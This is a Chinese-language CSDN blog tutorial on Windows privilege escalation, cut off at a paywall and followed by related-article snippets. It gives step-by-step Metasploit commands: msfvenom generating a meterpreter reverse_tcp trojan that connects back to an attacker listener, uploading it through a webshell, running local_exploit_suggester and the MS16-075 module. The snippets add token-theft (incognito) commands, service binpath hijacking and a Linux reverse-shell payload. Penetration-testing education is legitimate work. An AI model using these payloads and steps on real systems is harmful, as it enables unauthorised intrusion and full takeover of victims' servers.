Windows提权---MSF/令牌窃取/系统服务权限配置错误提权

已于 2022-07-02 22:48:14 修改
阅读量2.3k 收藏 14
点赞数 1
分类专栏: window提权 文章标签: windows web安全 网络 安全
于 2022-07-02 22:44:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40012781/article/details/125577464
版权
本文介绍了Windows系统权限提升的三种方法:利用MSF进行MS16_075提权,通过令牌窃取(如MSF伪造令牌、烂土豆提权)以及系统服务权限配置错误(如CVE-2019-1322)进行提权。详细阐述了每种方法的原理和操作步骤,涉及Meterpreter Shell、令牌的随机性和PowerUp、PrivescCheck等工具。
摘要由CSDN通过智能技术生成

提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升

在渗透测试中,通过是各种漏洞提升已获取的webshell权限以夺得服务器权限

一、MSF权限提升

MSF权限提升思路:

Msfvenom生成后门来反弹连接msf,查找目标有哪些可利用的漏洞然后进行提权...

MSF进行MS16_075提权

步骤一:使用Msfvenom生成木马...并通过WebShell上传至目标服务器...

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.113 lport=4444 -f exe >s.exe

步骤二:在MSF进行监听....

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.113
set lport 4444
exploit

步骤三:运行木马,获取反弹的Meterpreter Shell...

 上传木马并运行

步骤四:在MeterpreterShell中运行POST模块来查询补丁安装信息....(可选操作)

run post/windows/gather/enum_patches

步骤五:获取提权EXP... 

background
use post/multi/recon/local_exploit_suggester
set session 1
exploit

步骤六:选择以上结果中的随意EXP...不一定那个能用...

search ms16_075  #获取模块相关信息
use 1            #调用搜索出来的第一个模块
set session 1    #在模块中设置进行提权的会话
exploit          #开始提权...

最低0.47元/天 解锁文章
懒猫的sky
关注
专栏目录
操作系统权限提升(六)之系统错误配置-不安全服务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 1236
通常 Windows服务都是以 System权限运行的,当由于系统管理员错误配置导致低权限用户可以对某些服务修改时,可以通过修改服务启动文件的路径“ binpath”,将其替换为恶意程序的路径,这样服务启动时便会运行恶意程序
MSF令牌窃取
qq_53365842的博客
04-28 1721
令牌简介及原理 ● 令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络系统资源 ● 令牌最大的特点就是随机性,不可预测,一般黑客或软件无法猜测出来 ● 令牌有很多种: 访问令牌(Access Token)表示访问和控制操作主题的系统对象 密保令牌(Security Tocken)是一种计算机身份校验的物理设备 会话令牌(Session Tocken)的交互会话中唯一的身份标识符 实战利用 (1)先把目标打下来 (.
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
2401_85773496的博客
08-06 863
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
令牌窃取
weixin_50683638的博客
04-20 187
1、(开启一台parrot虚拟机和Windows7)进入msfconsol,使用模块use exploit /windows/smb/psexec 2,设置目标ip运行报错“login failed”时需要设置用户和密码。 3、在此处发生报错,设置payloadset payload windows/meterpreter/reverse_tcp 4.报错后设置目标IP为172.27.248.90输入172后tap就行了 5,获取到shell后getuid查看权限,首先输入use incognito
系统配置错误提权2
qq_42307546的博客
04-05 1042
5.2 不带引号的服务路径提权系统管理员配置Windows服务时,他们必须指定要执行的命令,或者运行可执行文件的路径。 当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则 系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到 的空格分隔的服务路径的第一个实例。 在c盘新建一个calc files文件夹里面创建一个文件文件叫cmd.bat内容如下 echo 123 并在c 盘目录下放置 calc.exe(计算器),在没有
msfWindows提权
wjq18827615690的博客
03-18 271
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低权限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1449
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1061
DLL注入提权、不带引号的服务路径提权、注册表提权
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4349
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
提权 - Windows 烂土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1245
提权 - Windows 烂土豆/ dll劫持 /服务权限
windows系统配置错误提权
Longwaer
01-05 1346
通过学习掌握windows系统服务权限配置错误,了解提权新技巧。
Windows系统服务权限配置错误漏洞提权
yangbz123的博客
05-17 1869
目录漏洞介绍AccessChk工具介绍AccessChk常用参数漏洞检查AccessChk工具检查Powerup脚本检查Empire powerup模块检查MSF 上传脚本扫描漏洞利用漏洞防范如何创建服务删除服务参考文献 漏洞介绍 系统服务权限配置错误,在Windows系统中的服务权限配置的那么完美总会有被忽视的地方,这些没有得到严格保护的系统服务,往往会被攻击者利用,系统服务权限设置有问题时,往往会导致如下风险,1、服务未运行攻击者会利用生成的服务替换掉原来的服务重启后提权,2、服务运行无法停止攻击者会
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 956
随着网络安全的发展和普及,不打补丁的系统少之又少,所以很多时候通过系统自身的漏洞很难提权,这个时候就需要考虑查看是否存在可利用的错误系统配置,例如路径未加引号或未指定可执行文件路径等,总而言之就是因为管理员在配置一些软件的时候存在漏洞导致可以提权的。
操作系统权限提升(七)之系统错误配置-不安全注册表提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 691
Windows服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权
操作系统权限提升(九)之系统错误配置-泄露敏感信息提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 466
只要我们能知道电脑的最高权限的账号密码,或者一些票据或者凭证我们就可以通过认证,执行最高权限的命令
内网渗透-windows令牌窃取
weixin_44912035的博客
02-10 331
令牌(token) 访问令牌(Access Token):表示访问控制操作主体的系统对象 会话令牌(Session Token):是交互会话中唯一的身份标识符。 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾 msf伪造令牌 use incognito #进入incognito模块 list_tokens -u #列出令牌 Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程
提权实战:MS16-075漏洞利用与Meterpreter反弹
重点环节在于利用MS16-075漏洞进行提权,这个漏洞允许攻击者利用远程系统上的漏洞来提升权限,即使这些漏洞并不直接关联到SMB服务。攻击者选择了一个名为"烂土豆"的方法,可能指的是特定的漏洞利用技术或工具集。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值